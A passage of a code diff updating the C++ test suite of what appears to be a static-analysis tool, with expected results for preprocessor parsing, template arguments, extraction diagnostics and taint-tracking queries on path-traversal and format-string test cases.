| +| atl.cpp:938:10:938:14 | SetAt | 0 | int | +| atl.cpp:938:10:938:14 | SetAt | 1 | XCHAR | +| atl.cpp:938:10:938:14 | SetAt | 1 | char | +| atl.cpp:939:10:939:18 | SetString | 0 | PCXSTR | +| atl.cpp:939:10:939:18 | SetString | 0 | const class:0 * | +| atl.cpp:939:10:939:18 | SetString | 1 | int | +| atl.cpp:940:10:940:18 | SetString | 0 | PCXSTR | +| atl.cpp:940:10:940:18 | SetString | 0 | const class:0 * | +| atl.cpp:942:11:942:20 | operator[] | 0 | int | +| atl.cpp:1036:5:1036:12 | CStringT | 0 | const VARIANT & | +| atl.cpp:1036:5:1036:12 | CStringT | 0 | const tagVARIANT & | +| atl.cpp:1037:5:1037:12 | CStringT | 0 | const VARIANT & | +| atl.cpp:1037:5:1037:12 | CStringT | 0 | const tagVARIANT & | +| atl.cpp:1037:5:1037:12 | CStringT | 1 | IAtlStringMgr * | +| atl.cpp:1038:5:1038:12 | CStringT | 0 | const CStringT & | +| atl.cpp:1042:5:1042:12 | CStringT | 0 | LPCSTR | +| atl.cpp:1042:5:1042:12 | CStringT | 0 | const char * | +| atl.cpp:1042:5:1042:12 | CStringT | 1 | IAtlStringMgr * | +| atl.cpp:1043:5:1043:12 | CStringT | 0 | LPCWSTR | +| atl.cpp:1043:5:1043:12 | CStringT | 0 | const wchar_t * | +| atl.cpp:1043:5:1043:12 | CStringT | 1 | IAtlStringMgr * | +| atl.cpp:1045:5:1045:12 | CStringT | 0 | char * | +| atl.cpp:1046:5:1046:12 | CStringT | 0 | unsigned char * | +| atl.cpp:1047:5:1047:12 | CStringT | 0 | wchar_t * | +| atl.cpp:1049:5:1049:12 | CStringT | 0 | char | +| atl.cpp:1049:5:1049:12 | CStringT | 1 | int | +| atl.cpp:1050:5:1050:12 | CStringT | 0 | wchar_t | +| atl.cpp:1050:5:1050:12 | CStringT | 1 | int | +| atl.cpp:1061:10:1061:21 | AppendFormat | 0 | PCXSTR | +| atl.cpp:1061:10:1061:21 | AppendFormat | 1 | ... | +| atl.cpp:1062:10:1062:21 | AppendFormat | 0 | UINT | +| atl.cpp:1062:10:1062:21 | AppendFormat | 0 | unsigned int | +| atl.cpp:1062:10:1062:21 | AppendFormat | 1 | ... | +| atl.cpp:1070:9:1070:14 | Insert | 0 | int | +| atl.cpp:1070:9:1070:14 | Insert | 1 | PCXSTR | +| atl.cpp:1071:9:1071:14 | Insert | 0 | int | +| atl.cpp:1071:9:1071:14 | Insert | 1 | XCHAR | +| atl.cpp:1071:9:1071:14 | Insert | 1 | class:0 | +| atl.cpp:1072:14:1072:17 | Left | 0 | int | +| atl.cpp:1075:10:1075:19 | LoadString | 0 | UINT | +| atl.cpp:1075:10:1075:19 | LoadString | 0 | unsigned int | +| atl.cpp:1079:14:1079:16 | Mid | 0 | int | +| atl.cpp:1079:14:1079:16 | Mid | 1 | int | +| atl.cpp:1081:9:1081:15 | Replace | 0 | PCXSTR | +| atl.cpp:1081:9:1081:15 | Replace | 1 | PCXSTR | +| atl.cpp:1082:9:1082:15 | Replace | 0 | XCHAR | +| atl.cpp:1082:9:1082:15 | Replace | 0 | class:0 | +| atl.cpp:1082:9:1082:15 | Replace | 1 | XCHAR | +| atl.cpp:1082:9:1082:15 | Replace | 1 | class:0 | +| atl.cpp:1083:14:1083:18 | Right | 0 | int | +| atl.cpp:1084:10:1084:21 | SetSysString | 0 | BSTR * | +| atl.cpp:1084:10:1084:21 | SetSysString | 0 | wchar_t ** | +| atl.cpp:1085:14:1085:26 | SpanExcluding | 0 | PCXSTR | +| atl.cpp:1086:14:1086:26 | SpanIncluding | 0 | PCXSTR | +| atl.cpp:1087:14:1087:21 | Tokenize | 0 | PCXSTR | +| atl.cpp:1087:14:1087:21 | Tokenize | 1 | int & | +| atl.cpp:1088:15:1088:18 | Trim | 0 | XCHAR | +| atl.cpp:1088:15:1088:18 | Trim | 0 | class:0 | +| atl.cpp:1089:15:1089:18 | Trim | 0 | PCXSTR | +| atl.cpp:1091:15:1091:22 | TrimLeft | 0 | XCHAR | +| atl.cpp:1091:15:1091:22 | TrimLeft | 0 | class:0 | +| atl.cpp:1092:15:1092:22 | TrimLeft | 0 | PCXSTR | +| atl.cpp:1094:15:1094:23 | TrimRight | 0 | XCHAR | +| atl.cpp:1094:15:1094:23 | TrimRight | 0 | class:0 | +| atl.cpp:1095:15:1095:23 | TrimRight | 0 | PCXSTR | +| atl.cpp:1215:10:1215:10 | operator= | 0 | CStringData && | +| atl.cpp:1215:10:1215:10 | operator= | 0 | const CStringData & | +| atl.cpp:1231:5:1231:12 | CStrBufT | 0 | StringType & | +| atl.cpp:1231:5:1231:12 | CStrBufT | 1 | int | +| atl.cpp:1231:5:1231:12 | CStrBufT | 2 | DWORD | +| atl.cpp:1231:5:1231:12 | CStrBufT | 2 | unsigned long | | bsd.cpp:6:8:6:8 | operator= | 0 | const sockaddr & | | bsd.cpp:6:8:6:8 | operator= | 0 | sockaddr && | | bsd.cpp:12:5:12:10 | accept | 0 | int | diff --git a/cpp/ql/test/library-tests/preprocessor/preprocessor/pp.cpp b/cpp/ql/test/library-tests/preprocessor/preprocessor/pp.cpp index 70fada58da98..8ff6ff9a3d38 100644 --- a/cpp/ql/test/library-tests/preprocessor/preprocessor/pp.cpp +++ b/cpp/ql/test/library-tests/preprocessor/preprocessor/pp.cpp @@ -10,7 +10,7 @@ // semmle-extractor-options: -I${testdir}/more_headers/ "-U SOME_SYM" #undef BAR #define SCARY(a,aa,aaah) /* we ignore a */ (aa /* but we take aa */) /* and we ignore aaa */ -#define LOG(fmt, ...) printf("Warning: %s", fmt, __VA__ARGS__) +#define LOG(fmt, ...) printf("Warning: %s", fmt, __VA__ARGS__) #include "pp.h" #if 0 @@ -59,7 +59,7 @@ class templateClassContext #else #define IN_TEMPLATE #endif - + static int val; }; @@ -71,7 +71,128 @@ templateClassContext tcci; #define BAR -#if defined(BAR) && \ +#if defined(BAR) &&\ defined(BAR) #warning BAR defined #endif + +#if defined MACROTHREE/**hello*/ && /*world*/\ +/*hw*/ (defined(MACROONE)) /* macroone */ +#endif + +#if defined SIMPLE_COMMENT //this comment \ + (defined(SIMPLE_COMMENT)) spans over multiple lines +#endif + +#if defined(FOO) &&\ + defined(BAR) +#define CONDITIONAL_MACRO_1 1 +#endif + +#if defined(FOO) && \ + defined(BAR) && \ + !defined(BAZ) +#define CONDITIONAL_MACRO_2 2 +#endif + +#define FOO 8 +#define BAR 2 +#define BAZ 4 +#if ((FOO / BAR) \ + == 4) && ((BAZ \ + * QUX) \ + > 10) +#define CONDITIONAL_MACRO_3 3 +#endif + +// Testing \t spaced PreprocessorIf +#if defined(FOO) && \ + defined(BAR) && \ + defined(BAZ) +#define CONDITIONAL_MACRO_4 4 +#endif + + +#if defined /* //test */ SIMPLE_COMMENT //this comment \ + (defined(SIMPLE_COMMENT)) spans over multiple lines +#endif + +#warning foo \ + +#warning foo \ +\ +/* a comment */ + +#warning foo \ +\ + +#warning foo \ +\ +// a comment + + +#define FOO 8 +#define BAR 2 +#define BAZ 4 +#if ((FOO / BAR) \ + == 4) && ((BAZ \ + /** comment */ \ + * QUX) \ + /** comment */ \ + > 10) +#define CONDITIONAL_MACRO_3 3 +#endif + +#define X 1 +#define Y 2 +#if defined(X) && \ + /*this is a comment*/ defined(Y) \ + // another comment +#endif + +#warning FOO\ + \ + \ + \ +BAR + + +#warning foo \ +\ +/* comment */ \ +\ + + +#if/** */A/* ... */&&B +#endif + + +#if/** */ /**/ A +#endif + +#if \ +\ +A && B +#endif + + +#ifdef /* + + + +*/ FOOBAR +#warning a +#else +#warning b +#endif + + +#if /* + +//test + +*/ FOOBAR +#endif + +#if/*...*//*...*/A +#endif \ No newline at end of file diff --git a/cpp/ql/test/library-tests/preprocessor/preprocessor/preproc.expected b/cpp/ql/test/library-tests/preprocessor/preprocessor/preproc.expected index d1b64ff7bd92..7c448ba6550e 100644 --- a/cpp/ql/test/library-tests/preprocessor/preprocessor/preproc.expected +++ b/cpp/ql/test/library-tests/preprocessor/preprocessor/preproc.expected @@ -33,17 +33,64 @@ | pp.cpp:0:0:0:0 | pp.cpp | 50 | 2 | 50 | 48 | Macro | MACRO_TEMPLATECLASSCONTEXT_REFERENCED | 5 | | pp.cpp:0:0:0:0 | pp.cpp | 54 | 3 | 54 | 39 | Macro | MACRO_TEMPLATEMETHODCONTEXT | 6 | | pp.cpp:0:0:0:0 | pp.cpp | 57 | 1 | 57 | 21 | PreprocessorIfdef | INSTANTIATION | N/A | -| pp.cpp:0:0:0:0 | pp.cpp | 59 | 1 | 59 | 6 | PreprocessorElse | N/A | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 59 | 1 | 59 | 6 | PreprocessorElse | | N/A | | pp.cpp:0:0:0:0 | pp.cpp | 60 | 3 | 60 | 21 | Macro | IN_TEMPLATE | | -| pp.cpp:0:0:0:0 | pp.cpp | 61 | 1 | 61 | 7 | PreprocessorEndif | N/A | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 61 | 1 | 61 | 7 | PreprocessorEndif | | N/A | | pp.cpp:0:0:0:0 | pp.cpp | 69 | 1 | 69 | 21 | Macro | INSTANTIATION | | | pp.cpp:0:0:0:0 | pp.cpp | 72 | 1 | 72 | 11 | Macro | BAR | | -| pp.cpp:0:0:0:0 | pp.cpp | 74 | 1 | 74 | 21 | PreprocessorIf | defined(BAR) && \\ | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 74 | 1 | 75 | 14 | PreprocessorIf | defined(BAR) && defined(BAR) | N/A | | pp.cpp:0:0:0:0 | pp.cpp | 76 | 1 | 76 | 20 | PreprocessorWarning | BAR defined | N/A | | pp.cpp:0:0:0:0 | pp.cpp | 77 | 1 | 77 | 6 | PreprocessorEndif | N/A | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 79 | 1 | 80 | 26 | PreprocessorIf | defined MACROTHREE && (defined(MACROONE)) | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 81 | 1 | 81 | 6 | PreprocessorEndif | N/A | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 83 | 1 | 83 | 26 | PreprocessorIf | defined SIMPLE_COMMENT | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 85 | 1 | 85 | 6 | PreprocessorEndif | N/A | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 87 | 1 | 88 | 16 | PreprocessorIf | defined(FOO) && defined(BAR) | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 90 | 1 | 90 | 6 | PreprocessorEndif | N/A | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 92 | 1 | 94 | 17 | PreprocessorIf | defined(FOO) && defined(BAR) && !defined(BAZ) | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 96 | 1 | 96 | 6 | PreprocessorEndif | N/A | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 98 | 1 | 98 | 13 | Macro | FOO | 8 | +| pp.cpp:0:0:0:0 | pp.cpp | 99 | 1 | 99 | 13 | Macro | BAR | 2 | +| pp.cpp:0:0:0:0 | pp.cpp | 100 | 1 | 100 | 13 | Macro | BAZ | 4 | +| pp.cpp:0:0:0:0 | pp.cpp | 101 | 1 | 104 | 8 | PreprocessorIf | ((FOO / BAR) == 4) && ((BAZ * QUX) > 10) | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 106 | 1 | 106 | 6 | PreprocessorEndif | N/A | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 109 | 1 | 111 | 13 | PreprocessorIf | defined(FOO) && defined(BAR) && defined(BAZ) | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 112 | 1 | 112 | 29 | Macro | CONDITIONAL_MACRO_4 | 4 | +| pp.cpp:0:0:0:0 | pp.cpp | 113 | 1 | 113 | 6 | PreprocessorEndif | N/A | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 116 | 1 | 116 | 39 | PreprocessorIf | defined SIMPLE_COMMENT | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 118 | 1 | 118 | 6 | PreprocessorEndif | N/A | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 120 | 1 | 120 | 12 | PreprocessorWarning | foo | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 122 | 1 | 122 | 12 | PreprocessorWarning | foo | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 126 | 1 | 126 | 12 | PreprocessorWarning | foo | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 129 | 1 | 129 | 12 | PreprocessorWarning | foo | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 134 | 1 | 134 | 13 | Macro | FOO | 8 | +| pp.cpp:0:0:0:0 | pp.cpp | 135 | 1 | 135 | 13 | Macro | BAR | 2 | +| pp.cpp:0:0:0:0 | pp.cpp | 136 | 1 | 136 | 13 | Macro | BAZ | 4 | +| pp.cpp:0:0:0:0 | pp.cpp | 137 | 1 | 142 | 8 | PreprocessorIf | ((FOO / BAR) == 4) && ((BAZ * QUX) > 10) | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 144 | 1 | 144 | 6 | PreprocessorEndif | N/A | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 146 | 1 | 146 | 11 | Macro | X | 1 | +| pp.cpp:0:0:0:0 | pp.cpp | 147 | 1 | 147 | 11 | Macro | Y | 2 | +| pp.cpp:0:0:0:0 | pp.cpp | 148 | 1 | 149 | 36 | PreprocessorIf | defined(X) && defined(Y) | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 151 | 1 | 151 | 6 | PreprocessorEndif | N/A | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 153 | 1 | 157 | 3 | PreprocessorWarning | FOO BAR | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 160 | 1 | 160 | 12 | PreprocessorWarning | foo | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 166 | 1 | 166 | 22 | PreprocessorIf | A &&B | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 167 | 1 | 167 | 6 | PreprocessorEndif | N/A | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 170 | 1 | 170 | 20 | PreprocessorIf | A | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 171 | 1 | 171 | 6 | PreprocessorEndif | N/A | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 173 | 1 | 175 | 6 | PreprocessorIf | A && B | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 176 | 1 | 176 | 6 | PreprocessorEndif | N/A | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 179 | 1 | 183 | 9 | PreprocessorIfdef | FOOBAR | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 185 | 1 | 185 | 5 | PreprocessorElse | N/A | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 186 | 1 | 186 | 10 | PreprocessorWarning | b | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 187 | 1 | 187 | 6 | PreprocessorEndif | N/A | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 190 | 1 | 194 | 9 | PreprocessorIf | FOOBAR | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 195 | 1 | 195 | 6 | PreprocessorEndif | N/A | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 197 | 1 | 197 | 18 | PreprocessorIf | A | N/A | +| pp.cpp:0:0:0:0 | pp.cpp | 198 | 1 | 198 | 6 | PreprocessorEndif | N/A | N/A | | pp.h:0:0:0:0 | pp.h | 1 | 1 | 1 | 12 | PreprocessorPragma | once | N/A | | pp.h:0:0:0:0 | pp.h | 2 | 1 | 2 | 29 | PreprocessorWarning | "This should happen" | N/A | -| pp.h:0:0:0:0 | pp.h | 3 | 1 | 3 | 27 | PreprocessorLine | 33 "emerald_city.h" | N/A | +| pp.h:0:0:0:0 | pp.h | 3 | 1 | 3 | 27 | PreprocessorLine | 33 "emerald_city.h" | N/A | | pp.h:0:0:0:0 | pp.h | 4 | 1 | 4 | 30 | PreprocessorPragma | byte_order(big_endian) | N/A | | pp.h:0:0:0:0 | pp.h | 5 | 1 | 5 | 33 | PreprocessorWarning | "Not in Kansas any more" | N/A | | pp.h:0:0:0:0 | pp.h | 7 | 1 | 11 | 8 | Macro | MULTILINE | world a long | diff --git a/cpp/ql/test/library-tests/templates/nontype_instantiations/general/test.expected b/cpp/ql/test/library-tests/templates/nontype_instantiations/general/test.expected index fa5df86f68fe..c4b76a9d2fc1 100644 --- a/cpp/ql/test/library-tests/templates/nontype_instantiations/general/test.expected +++ b/cpp/ql/test/library-tests/templates/nontype_instantiations/general/test.expected @@ -1,13 +1,13 @@ -| test.cpp:3:8:3:8 | C<1> | 0 | int | test.cpp:5:25:5:25 | 1 | -| test.cpp:3:8:3:8 | C<2> | 0 | int | file://:0:0:0:0 | 2 | -| test.cpp:3:8:3:8 | C | 0 | int | file://:0:0:0:0 | x | -| test.cpp:10:8:10:8 | D | 0 | | test.cpp:9:19:9:19 | T | -| test.cpp:10:8:10:8 | D | 1 | T | file://:0:0:0:0 | X | -| test.cpp:10:8:10:8 | D | 0 | | file://:0:0:0:0 | int | -| test.cpp:10:8:10:8 | D | 1 | int | test.cpp:12:8:12:8 | 2 | -| test.cpp:10:8:10:8 | D | 0 | | file://:0:0:0:0 | long | -| test.cpp:10:8:10:8 | D | 1 | long | file://:0:0:0:0 | 2 | -| test.cpp:16:8:16:8 | E | 0 | | test.cpp:15:19:15:19 | T | -| test.cpp:16:8:16:8 | E | 1 | T * | file://:0:0:0:0 | X | -| test.cpp:16:8:16:8 | E | 0 | | file://:0:0:0:0 | int | -| test.cpp:16:8:16:8 | E | 1 | int * | file://:0:0:0:0 | 0 | +| test.cpp:3:8:3:8 | C<1> | 0 | int | test.cpp:5:25:5:25 | 1 | 1 | +| test.cpp:3:8:3:8 | C<2> | 0 | int | file://:0:0:0:0 | 2 | 2 | +| test.cpp:3:8:3:8 | C | 0 | int | file://:0:0:0:0 | x | x | +| test.cpp:10:8:10:8 | D | 0 | | test.cpp:9:19:9:19 | T | | +| test.cpp:10:8:10:8 | D | 1 | T | file://:0:0:0:0 | X | X | +| test.cpp:10:8:10:8 | D | 0 | | file://:0:0:0:0 | int | | +| test.cpp:10:8:10:8 | D | 1 | int | test.cpp:12:8:12:8 | 2 | 2 | +| test.cpp:10:8:10:8 | D | 0 | | file://:0:0:0:0 | long | | +| test.cpp:10:8:10:8 | D | 1 | long | file://:0:0:0:0 | 2 | 2 | +| test.cpp:16:8:16:8 | E | 0 | | test.cpp:15:19:15:19 | T | | +| test.cpp:16:8:16:8 | E | 1 | T * | file://:0:0:0:0 | X | X | +| test.cpp:16:8:16:8 | E | 0 | | file://:0:0:0:0 | int | | +| test.cpp:16:8:16:8 | E | 1 | int * | file://:0:0:0:0 | 0 | 0 | diff --git a/cpp/ql/test/library-tests/templates/nontype_instantiations/general/test.ql b/cpp/ql/test/library-tests/templates/nontype_instantiations/general/test.ql index 68d597e0f983..c6b7efdbf2e4 100644 --- a/cpp/ql/test/library-tests/templates/nontype_instantiations/general/test.ql +++ b/cpp/ql/test/library-tests/templates/nontype_instantiations/general/test.ql @@ -9,6 +9,16 @@ string maybeGetTemplateArgumentKind(Declaration d, int i) { i = [0 .. d.getNumberOfTemplateArguments()] } +string maybeGetTemplateArgumentValue(Declaration d, int i) { + ( + if exists(d.getTemplateArgument(i).(Expr).getValue()) + then result = d.getTemplateArgument(i).(Expr).getValue() + else result = "" + ) and + i = [0 .. d.getNumberOfTemplateArguments()] +} + from Declaration d, int i where i >= 0 and i < d.getNumberOfTemplateArguments() -select d, i, maybeGetTemplateArgumentKind(d, i), d.getTemplateArgument(i) +select d, i, maybeGetTemplateArgumentKind(d, i), d.getTemplateArgument(i), + maybeGetTemplateArgumentValue(d, i) diff --git a/cpp/ql/test/query-tests/Diagnostics/ExtractionErrors.expected b/cpp/ql/test/query-tests/Diagnostics/ExtractionErrors.expected index f7d1b79cd17a..1fa546094224 100644 --- a/cpp/ql/test/query-tests/Diagnostics/ExtractionErrors.expected +++ b/cpp/ql/test/query-tests/Diagnostics/ExtractionErrors.expected @@ -1,2 +1,3 @@ +| containserror.cpp:9:14:9:14 | Recoverable extraction error: 'x' has already been declared in the current scope | Extraction failed in containserror.cpp with error "containserror.cpp", line 9: error: "x" has already been declared in the current scope\n \tconst char *x = "Foo2 $$@ bar2 $$@ baz2";\n \t ^\n\n | 2 | | doesnotcompile.cpp:4:2:4:2 | Recoverable extraction error: identifier 'This' is undefined | Extraction failed in doesnotcompile.cpp with error "doesnotcompile.cpp", line 4: error: identifier "This" is undefined\n \tThis is not correct C/C++ code.\n \t^\n\n | 2 | | doesnotcompile.cpp:4:10:4:10 | Recoverable extraction error: expected a ';' | Extraction failed in doesnotcompile.cpp with error "doesnotcompile.cpp", line 4: error: expected a ";"\n \tThis is not correct C/C++ code.\n \t ^\n\n | 2 | diff --git a/cpp/ql/test/query-tests/Diagnostics/ExtractionWarnings.expected b/cpp/ql/test/query-tests/Diagnostics/ExtractionWarnings.expected index 69cba1e1420c..2393f4dbde02 100644 --- a/cpp/ql/test/query-tests/Diagnostics/ExtractionWarnings.expected +++ b/cpp/ql/test/query-tests/Diagnostics/ExtractionWarnings.expected @@ -1,2 +1,3 @@ +| containserror.cpp:9:14:9:14 | Recoverable extraction error: 'x' has already been declared in the current scope | Extraction failed in containserror.cpp with warning "containserror.cpp", line 9: error: "x" has already been declared in the current scope\n \tconst char *x = "Foo2 $$@ bar2 $$@ baz2";\n \t ^\n\n | 1 | | doesnotcompile.cpp:4:2:4:2 | Recoverable extraction error: identifier 'This' is undefined | Extraction failed in doesnotcompile.cpp with warning "doesnotcompile.cpp", line 4: error: identifier "This" is undefined\n \tThis is not correct C/C++ code.\n \t^\n\n | 1 | | doesnotcompile.cpp:4:10:4:10 | Recoverable extraction error: expected a ';' | Extraction failed in doesnotcompile.cpp with warning "doesnotcompile.cpp", line 4: error: expected a ";"\n \tThis is not correct C/C++ code.\n \t ^\n\n | 1 | diff --git a/cpp/ql/test/query-tests/Diagnostics/Info.expected b/cpp/ql/test/query-tests/Diagnostics/Info.expected index a32541303609..77a298109d6f 100644 --- a/cpp/ql/test/query-tests/Diagnostics/Info.expected +++ b/cpp/ql/test/query-tests/Diagnostics/Info.expected @@ -1,4 +1,4 @@ -| containserror.cpp:0:0:0:0 | containserror.cpp | containserror.cpp | fromSource, normalTermination | +| containserror.cpp:0:0:0:0 | containserror.cpp | containserror.cpp | ExtractionProblem (severity 1), fromSource, normalTermination | | containswarning.cpp:0:0:0:0 | containswarning.cpp | containswarning.cpp | fromSource, normalTermination | | doesnotcompile.cpp:0:0:0:0 | doesnotcompile.cpp | doesnotcompile.cpp | ExtractionProblem (severity 1), fromSource, normalTermination | | file://:0:0:0:0 | | | | diff --git a/cpp/ql/test/query-tests/Diagnostics/containserror.cpp b/cpp/ql/test/query-tests/Diagnostics/containserror.cpp index 175fcc579f11..63e11dfe64fa 100644 --- a/cpp/ql/test/query-tests/Diagnostics/containserror.cpp +++ b/cpp/ql/test/query-tests/Diagnostics/containserror.cpp @@ -3,3 +3,8 @@ void containserror() { #error An error! } + +void error_with_placeholder() { + const char *x = "Foo1 $@ bar1 $@ baz1"; + const char *x = "Foo2 $@ bar2 $@ baz2"; +} \ No newline at end of file diff --git a/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 17/BasicIntTypes.expected b/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 17/BasicIntTypes.expected index 0664ca9e3698..58facbeac8e2 100644 --- a/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 17/BasicIntTypes.expected +++ b/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 17/BasicIntTypes.expected @@ -1,3 +1 @@ | test.c:6:26:6:26 | x | x uses the basic integral type unsigned char rather than a typedef with size and signedness. | -| test.c:7:20:7:20 | x | x uses the basic integral type unsigned char rather than a typedef with size and signedness. | -| test.c:10:16:10:20 | test7 | test7 uses the basic integral type unsigned char rather than a typedef with size and signedness. | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.expected index dc8bb31748a8..031804b92251 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.expected @@ -1,7 +1,13 @@ edges +| CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:62:25:62:46 | ... = ... | provenance | | +| CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:69:21:69:40 | ... = ... | provenance | | | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:77:23:77:26 | *data | provenance | | +| CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:62:25:62:46 | ... = ... | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:77:23:77:26 | *data | provenance | | +| CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:69:21:69:40 | ... = ... | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:77:23:77:26 | *data | provenance | | nodes | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | semmle.label | fgets output argument | +| CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:62:25:62:46 | ... = ... | semmle.label | ... = ... | +| CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:69:21:69:40 | ... = ... | semmle.label | ... = ... | | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:77:23:77:26 | *data | semmle.label | *data | subpaths #select diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.expected index 835bff109bf3..560ecc8bd775 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.expected @@ -1,12 +1,21 @@ edges +| char_connect_socket_w32_vsnprintf_01_bad.c:94:46:94:69 | recv output argument | char_connect_socket_w32_vsnprintf_01_bad.c:100:13:100:60 | ... = ... | provenance | | | char_connect_socket_w32_vsnprintf_01_bad.c:94:46:94:69 | recv output argument | char_connect_socket_w32_vsnprintf_01_bad.c:125:15:125:18 | *data | provenance | | +| char_connect_socket_w32_vsnprintf_01_bad.c:100:13:100:60 | ... = ... | char_connect_socket_w32_vsnprintf_01_bad.c:125:15:125:18 | *data | provenance | | +| char_console_fprintf_01_bad.c:30:23:30:35 | fgets output argument | char_console_fprintf_01_bad.c:37:21:37:43 | ... = ... | provenance | | +| char_console_fprintf_01_bad.c:30:23:30:35 | fgets output argument | char_console_fprintf_01_bad.c:44:17:44:37 | ... = ... | provenance | | | char_console_fprintf_01_bad.c:30:23:30:35 | fgets output argument | char_console_fprintf_01_bad.c:49:21:49:24 | *data | provenance | | +| char_console_fprintf_01_bad.c:37:21:37:43 | ... = ... | char_console_fprintf_01_bad.c:49:21:49:24 | *data | provenance | | +| char_console_fprintf_01_bad.c:44:17:44:37 | ... = ... | char_console_fprintf_01_bad.c:49:21:49:24 | *data | provenance | | | char_environment_fprintf_01_bad.c:27:30:27:35 | *call to getenv | char_environment_fprintf_01_bad.c:27:30:27:35 | *call to getenv | provenance | | | char_environment_fprintf_01_bad.c:27:30:27:35 | *call to getenv | char_environment_fprintf_01_bad.c:36:21:36:24 | *data | provenance | TaintFunction | nodes | char_connect_socket_w32_vsnprintf_01_bad.c:94:46:94:69 | recv output argument | semmle.label | recv output argument | +| char_connect_socket_w32_vsnprintf_01_bad.c:100:13:100:60 | ... = ... | semmle.label | ... = ... | | char_connect_socket_w32_vsnprintf_01_bad.c:125:15:125:18 | *data | semmle.label | *data | | char_console_fprintf_01_bad.c:30:23:30:35 | fgets output argument | semmle.label | fgets output argument | +| char_console_fprintf_01_bad.c:37:21:37:43 | ... = ... | semmle.label | ... = ... | +| char_console_fprintf_01_bad.c:44:17:44:37 | ... = ... | semmle.label | ... = ... | | char_console_fprintf_01_bad.c:49:21:49:24 | *data | semmle.label | *data | | char_environment_fprintf_01_bad.c:27:30:27:35 | *call to getenv | semmle.label | *call to getenv | | char_environment_fprintf_01_bad.c:27:30:27:35 | *call to getenv | semmle.label | *call to getenv | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.expected index e59c3e893a4f..421d12dabd31 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.expected @@ -1,6 +1,9 @@ edges -| consts.cpp:24:7:24:9 | **gv1 | consts.cpp:24:7:24:9 | **gv1 | provenance | | +| consts.cpp:24:7:24:9 | **gv1 | consts.cpp:25:2:25:4 | *a | provenance | | | consts.cpp:24:7:24:9 | **gv1 | consts.cpp:30:9:30:14 | *access to array | provenance | | +| consts.cpp:24:7:24:9 | **gv1 | consts.cpp:123:2:123:12 | *... = ... | provenance | | +| consts.cpp:25:2:25:4 | *a | 